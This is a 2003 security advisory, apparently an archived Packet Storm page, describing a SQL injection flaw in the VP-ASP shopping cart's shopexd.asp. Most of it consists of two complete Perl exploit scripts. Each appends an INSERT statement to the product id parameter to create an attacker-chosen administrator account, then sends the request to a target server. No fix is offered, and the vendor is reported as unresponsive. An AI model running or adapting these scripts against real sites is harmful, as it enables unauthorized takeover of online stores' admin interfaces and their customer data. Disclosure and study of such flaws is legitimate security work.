VP-ASP suffers from a SQL injection attack in shopexd.asp. The vulnerability allows a remote attacker to gain full administrative control of the web based interface.
acef5d0430f484356d4bafe6d6bb7a863035055ef4891db178a00a0e6eee8b36$Id: aresu-adv.6,v1 04/07/2003 aresu Exp $
1ndonesian Security Team (1st)
AresU Advisory #6 VPASP SQL Injection
04/07/2003
VPASP SQL Injection Vulnerability & Exploit CODE
_______________________________________________________________________________
Advisory Name: VPASP SQL Injection Vulnerability
Release Date: 05/07/2003
Application: 5
Platform: Win32/MSSQL
Severity: High
BUG Type: SQL Injection
Discover by: AresU <aresu@bosen.net> & TioEuy <tioeuy@bosen.net>
Author: Bosen <mobile@bosen.net>
Vendor Status: See below.
Vendor URL: http://www.vpasp.com/
Reference: http://bosen.net/releases/
Overview:
VP-ASP is now in use in over 70 countries and has every major feature
you would expect from an e-commerce solution. VP-ASP combines ease of use and powerful features with unlimited customization.
more nice reading at http://www.vpasp.com itself.
Details:
Looking at vpasp source code, we found nice SQL Injection vuln. which is lies on shopexd.asp. Exploiting is not hard to do. Insert new user with admin priviledge can be done in a sec. Which is would couse full control to web based admin interface.
Exploits/POC:
by Bosen
--------
#!/usr/bin/perl -w
$pamer = "
1ndonesian Security Team (1st)
==============================
tio-fux.pl, vpasp SQL Injection Proof of Concept
Exploit by : Bosen & TioEuy
Discover by : TioEuy, AresU
Greetz to : AresU, syzwz (ta for da ipod), TioEuy, sakitjiwa,
muthafuka all #hackers\@centrin.net.id/austnet.org
http://bosen.net/releases/
"; # shut up ! we're the best in our country :)
use LWP::UserAgent; # LWP Mode sorry im lazy :)
use HTTP::Request;
use HTTP::Response;
$| = 1;
print $pamer;
if ($#ARGV<3){
print "\n Usage: perl tio-fux.pl <uri> <prod-id> <user> <password>
\n\n";
exit;
}
my $biji =
"1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29";
$tio = "$ARGV[0]/shopexd.asp?id=$ARGV[1]";
$tio .= ";insert into tbluser
(\"fldusername\",\"fldpassword\",\"fldaccess\") ";
$tio .= "values ('$ARGV[2]','$ARGV[3]','$biji')--";
my $bosen = LWP::UserAgent->new();
my $gembel = HTTP::Request->new(GET => $tio);
my $dodol = $bosen->request($gembel);
if ($dodol->is_error()) {
printf " %s\n", $dodol->status_line;
} else {
print "Tuing !\n";
}
print "\n680165\n";
--END--
by Aresu
--------
#!/usr/bin/perl
# PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE***PRIVATE
# 1ndonesian Security Team (1st)
# ==============================
# VP-ASP Shopping Cart - Exploit
# Discover by : TioEuy & AresU;
# Greetz to: syzwz (ta for da ipod), Bosen, sakitjiwa, muthafuka all
# hackers@centrin.net.id/austnet.org, #romance@centrin.net.id
# http://bosen.net/releases/
use Socket;
$dodolbasik = "tioeuy.pl, VPASP exploit by TioEuy&AresU ";
$aksesnya
="1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29";
$pieldnya = '"fldusername","fldpassword","fldaccess"';
if ($#ARGV<4)
{
print "\n$dodolbasik";
print "\n\n Usage: perl tioeuy.pl <server> <full path> <id> <user>
<password> \n\n";
exit;
}
$kupret="$ARGV[1]shopexd.asp?id=$ARGV[2];insert into tbluser
($pieldnya)
values ('$ARGV[3]','$ARGV[4]','$aksesnya')--";
$kupret=~s/\ /%20/g;
$kupret="GET $kupret HTTP/1.0\r\nHost: $ARGV[0]\r\n\r\n";
print $kupret;
$port=80;
$host=$ARGV[0];
$target = inet_aton($host);
@hasil=sendraw($kupret);
print $gembel;
print @hasil;
# ------------- Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw { # this saves the whole transaction anyway
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
my @in;
select(S); $|=1; print $pstr;
while(<S>){ push @in, $_;}
select(STDOUT); close(S); return @in;
}
}
--END--
Vendor Response:
Contacted. No response.
Recommendation:
No recommendation for this.
1ndonesian Security Team (1st) Advisory:
http://bosen.net/releases/
About 1ndonesian Security Team:
1ndonesian Security Team, research and develop intelligent, advanced
application security assessment. Based in Indonesia, 1ndonesian Security Team offers best of breed security consulting services, specialising in application, host and network security assessments.
1st provides security information and patches for use by the entire 1st
community.
This information is provided freely to all interested parties and may be
redistributed provided that it is not altered in any way, 1st is appropriately
credited and the document retains.
Greetz to:
Bosen, sakitjiwa, muthafuka, alphacentury, Gembul, syzwz, Heltz, TomIngShUu, riico, w4n
All 1ndonesian Security Team - #hackers@austnet.org/centrin.net.id
****************************************************************************
this advisory is for educational purpose only, the author is not
responsible for anything happened with the use of this script *cupz*
****************************************************************************
AresU <aresu@bosen.net>
======================
Original document can be fount at http://bosen.net/releases/?id=41
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed